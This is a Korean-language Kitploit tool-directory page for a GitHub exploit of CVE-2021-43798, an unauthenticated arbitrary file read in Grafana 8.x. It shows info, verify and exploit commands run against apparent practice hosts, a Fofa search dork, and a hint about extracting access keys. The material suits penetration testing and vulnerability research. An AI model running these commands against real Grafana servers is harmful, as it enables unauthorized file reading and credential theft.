Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2021-43798 — Grafana 임의 파일 읽기 취약점 | Kitploit
도구/GitHubGitHub/zer0yu/cve-2021-43798
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubzer0yu/cve-2021-43798

CVE-2021-43798

Grafana 임의 파일 읽기 취약점

저장소 보기
2764년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

GrafanaArbitraryFileRead

사용법

1. 정보 표시

root@kitploit:~
❯ go run main.go -s                                               
[INF] VulnInfo:
{
  "Name": "Grafana Arbitrary File Read",
  "VulID": "nil",
  "Version": "1.0",
  "Author": "z3",
  "VulDate": "2021-12-07",
  "References": [
    "https://nosec.org/home/detail/4914.html"
  ],
  "AppName": "Grafana",
  "AppPowerLink": "https://grafana.com/",
  "AppVersion": "Grafana Version 8.*",
  "VulType": "Arbitrary File Read",
  "Description": "An unauthorized arbitrary file reading vulnerability exists in Grafana, which can be exploited by an attacker to read arbitrary files on the host computer without authentication.",
  "Category": "REMOTE",
  "Dork": {
    "Fofa": "app=\"Grafana\"",
    "Quake": "",
    "Zoomeye": "",
    "Shodan": ""
  }
}%     

2. 확인

root@kitploit:~
echo vulfocus.fofa.so:55628 | go run main.go -v -t 20
http://vulfocus.fofa.so:55628

3. 익스플로잇

root@kitploit:~
echo http://vulfocus.fofa.so:51766 | go run main.go -m exploit -v

참고 1의 활용 아이디어를 구현한 것입니다. 더 많은 정보를 추출하려면 getAccesskey 함수의 정규식을 수정하십시오.

참고

  1. Grafana 최신 임의 파일 읽기 분석 및 파생 문제 설명
  2. Grafana 무단 임의 파일 읽기 취약점

고지 사항

이 절차는 보안 자체 점검 용도로만 사용되며, 현지 법률을 자발적으로 준수하시기 바랍니다.

도구 다운로드